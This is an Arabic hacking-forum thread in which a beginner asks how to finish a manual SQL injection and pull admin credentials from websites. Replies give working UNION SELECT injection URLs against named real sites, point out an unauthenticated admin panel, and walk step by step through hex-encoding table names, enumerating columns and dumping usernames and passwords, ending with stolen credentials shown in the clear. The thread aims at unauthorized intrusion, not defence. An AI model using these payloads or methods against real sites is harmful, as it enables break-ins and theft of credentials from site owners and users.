التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-18-2012, 06:06 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية dodoo
 

 

 
إحصائية العضو





dodoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dodoo is on a distinguished road

Unhappy مجاب: حل مشكله فى اختراق المواقع عن طريق السكيول



السلام عليكم ورحمة الله وبركاته

انا من مبتدأيين اختراق المواقع عن طريق الحقن الاعمى sql

لقد اخترقت مواقع كثيره ولكن بمساعدة برامج مثل برنامج الهافج وغيره من برامج

اختراق الموقع

لقد قررت من فتره ان اخترق يدويا وليس بمساعدة اى برامج من برامج الاختراق

احضرت موقع مصاب بثغره سكيول واستخرجت عدد الاعمده والعمود المصاب
واصدار القاعده ويوزر القاعده

واستخرجت ايضا عمود اليوزر والباسورد ها هما

password>dmc091850_db>phplist_admin

ماذا افعل بعد ذلك حتى استخرج يوزر الموقع والباسورد

انا اقف فى هذه الخطوه ولا اعرف مااذا افعل وانا على هذا الحال اكثر من شهرين ارجوكم
اريد ان يفيدنى احدا

ما المطلوب فعله حتى استطيع استخراج يوزر وباسورد الموقع

منتظر ردودكم رجاء الرد يكون موضح



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC pg la;gi tn hojvhr hgl,hru uk 'vdr hgs;d,g

   

رد مع اقتباس
أفضل جواب - كتبه Dr.Unkn0wn
و عليكم السلام و رحمة الله و بركاته
أخـ،ــي لو تأخُذ بنصيحــ،ــــي
لتُصبح مُحترفـ في الإستغلالات تعلمـ لغة الـPHP
ثمـ
أعد تعلم حقن الثغرة من البدايــ،ــة من هنـ،ــأ :

دوره عالم المواقع SQL 1nj3ct!on

و بعد ما تكملهــأ راحـ تُصبحـ على علم بكُل شيئ ،،
أحسن من أن أعطيك الحُقنة و أنت لا تعلم شيئاً بهـا ،،
في أمان الله

قديم 03-18-2012, 06:14 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
Dr.Unkn0wn
.:: لا إله إلا الله محمد رسول الله ::.
 
الصورة الرمزية Dr.Unkn0wn
 

 

 
إحصائية العضو






Dr.Unkn0wn غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Unkn0wn is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول


و عليكم السلام و رحمة الله و بركاته
أخـ،ــي لو تأخُذ بنصيحــ،ــــي
لتُصبح مُحترفـ في الإستغلالات تعلمـ لغة الـPHP
ثمـ
أعد تعلم حقن الثغرة من البدايــ،ــة من هنـ،ــأ :

دوره عالم المواقع SQL 1nj3ct!on

و بعد ما تكملهــأ راحـ تُصبحـ على علم بكُل شيئ ،،
أحسن من أن أعطيك الحُقنة و أنت لا تعلم شيئاً بهـا ،،
في أمان الله

   

رد مع اقتباس
قديم 03-18-2012, 06:20 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية dodoo
 

 

 
إحصائية العضو





dodoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dodoo is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول


ارجوك اعطينى الحقنه افضل لقد مللت

اعطينى حل لمشكلتى للخطوه التى اقف بها ارجوك

رجاء لا احد يمر بموضوعى ويرد
خذ دوره او تعلم شىء ارجوكم اريد حل لمشكله فقط

   

رد مع اقتباس
قديم 03-18-2012, 06:28 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
Dr.Unkn0wn
.:: لا إله إلا الله محمد رسول الله ::.
 
الصورة الرمزية Dr.Unkn0wn
 

 

 
إحصائية العضو






Dr.Unkn0wn غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Unkn0wn is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول


كما تُريد ،،
ضع إلى أين أنت واصل و سأكملهـا لكـ ،،

   

رد مع اقتباس
قديم 03-18-2012, 06:41 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية dodoo
 

 

 
إحصائية العضو





dodoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dodoo is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول


انا اقف هنا يا اخى
ماذا افعل بعد ذلك لاستخرج يوزر وباسورد الادمن


http://tui.cn/sichuan/show.php?id=57...115,%2037%29--

   

رد مع اقتباس
قديم 03-18-2012, 07:21 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
Dr.Unkn0wn
.:: لا إله إلا الله محمد رسول الله ::.
 
الصورة الرمزية Dr.Unkn0wn
 

 

 
إحصائية العضو






Dr.Unkn0wn غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Unkn0wn is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول



كود PHP:
http://tui.cn/sichuan/show.php?id=577+union+select+1,2,concat(id,0x3a,password),4,5,6,7,8,9,10+from+phplist_admin-- 
حبيبي متعب حالك على الفاضــي ،،
شوف اللوحة ،،
تدخل لها بدون تعريف
http://tui.cn/sichuan/admin/

التعديل الأخير تم بواسطة Dr.Unkn0wn ; 03-18-2012 الساعة 07:25 PM.

   

رد مع اقتباس
قديم 03-18-2012, 07:46 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية dodoo
 

 

 
إحصائية العضو





dodoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dodoo is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول


اخى اعلم والله ان اللوحه من الممكن ان ادخل لها بدون تعريف ولكن انت لم تفيدنى حتى اللان فى حل مشكلتى انا اريد ان اكمل حقنتى يدويا وقد وقفت فى هذه الخطوه التى جعلتك تراها ماذا افعل بعد ذلك حتى استخرج يوزر الموقع والباسورد رجاء اضف لى الاوامر المستخدمه من بعد هذه الخطوه وكيفيه استخدامها حتى ولو شرح مبسط وانا ساحاول الفهم ماذا افعل بعد ذلك حتى استخرج اليوزر والباسورد حتى لو مش ده الموقع اللى عاوز اخترقه انا فى كل المواقع اللى بحاول اخترقها بقف فى الخطوه دى عاوز اعرف الطريقه الصحيحيه لاستكمال الحقنه حتى استخراج يوزر الادمن وباسورده
رجاء الرد وشكرا على متابعتك لموضوعى

   

رد مع اقتباس
قديم 03-18-2012, 10:58 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو








دام علاء العماد غير متواجد حالياً

إرسال رسالة عبر Skype إلى دام علاء العماد

 

 

إحصائية الترشيح

عدد النقاط : 10
دام علاء العماد is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول


تفضل يا أخي الكريم ، هذا الموضوع يشرح الخطوات التي تمر من خلالها أثناء عملية الحقن ، و يشرح لك باقي الخطوات التي توقفت أنت عندها

ترتيب الخطوات في حقن قواعد البيانات SQL Injection

   

رد مع اقتباس
قديم 03-19-2012, 02:43 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية dodoo
 

 

 
إحصائية العضو





dodoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dodoo is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول


جزاك الله كل خير يا اخى
شكرا لمتابعتك لحل مشكلتى جعله الله فى ميزان حسناتك ان شاء الله

   

رد مع اقتباس
قديم 03-19-2012, 02:46 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو






ضمير العراقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ضمير العراقي is on a distinguished road

افتراضي رد: حل مشكله فى اختراق المواقع عن طريق السكيول



الان يظهر لنا
file_users[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/tongue.gif[/IMG]ass:darkdb
الان نعرف ماذا ظهر لنا
file_users:اسم الجدول
pass:هذا اسم عمود الباسورد لي انحنة طلعناه
darkdb:غير مهمة
الان طلعنة اسم الباسورد والان نظلع عمود اليوزر كيف اولا
نذهب لهذا الموقع
http://waraxe.us/sql-char-encoder.html
ونشفر كلمة
file_users
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/5kd65kqqvzvsi2htbyu7.png[/IMG]

[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/0inwhy9lip907ip491tk.png[/IMG]
عندما نذهب الى الموقع نضع الكلمة المراد تشفيرها في الخانة الولى ونضغط
Encode now
الان نحضر التشفير من ثاني خانة على اليسار
0x66696c655f7573657273
هذا التشفير
الان نظع الامر تالي بدل الامر
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)
نمسحة ونضع الاتي
where+table_name=xxxx
مع تغير xxx
الى التشقير فيصبح
where+table_name=0x66696c655f7573657273
وفائتة هذا الامر هو لاظهار عمود اليوزر
فيصبح الموقع

http://modules.t-o-m-e.net/module.ph...5f7573657273--
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/58p8t6drc5hq2kcx2n.png[/IMG]
file_users:name:darkdb
الان ظهر الانةfile_users:name:darkdb
name:هذا عمود اليوزر
الان سوف نظهر اليوزر والباسورد
الان نحذف هذا كلة
information_schema.columns+where+table_name=0x6669 6c655f7573657273
ونضع بدلة
file_users
يعني يقول لة احضر من هذا الجدول
ونحذف من الامر
Concat(table_name,0x3a,column_name,0x3a,table_sche ma)
نحف
table_name,0x3a,column_name
ونظع بدلة
اسم عمود اليوزر وهو
name
يعني يصبح احضر من الجدول هذا اليوزر
ونحذف
table_schema
ونظع بدلة اسم عمود الباسورد وهو
pass
يعني يقول لة احضر الباسورد من الجدول هذا
فلخلاصة هي تقول الحقنة ان تحضر من الجدول file_users اليوزر هو name والباسورد هو pass
فيصبح الموقع
http://modules.t-o-m-e.net/module.php?id=-52+Union+Select+1,2,3,Concat(name,0x3a,pass),5,6,7 ,8,9,10,11,12,13+from+file_users--
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/zggettd5u8om0cbeyq04.png[/IMG]
مبرووووووووووووووووك عليك
darkgod:filezzz

darkgod:اليوزر
filezzz:الباسورد

التوقيع

http://www6.0zz0.com/2011/07/25/18/284358811.gif

 


التعديل الأخير تم بواسطة ضمير العراقي ; 03-19-2012 الساعة 02:49 PM.

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 07:17 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0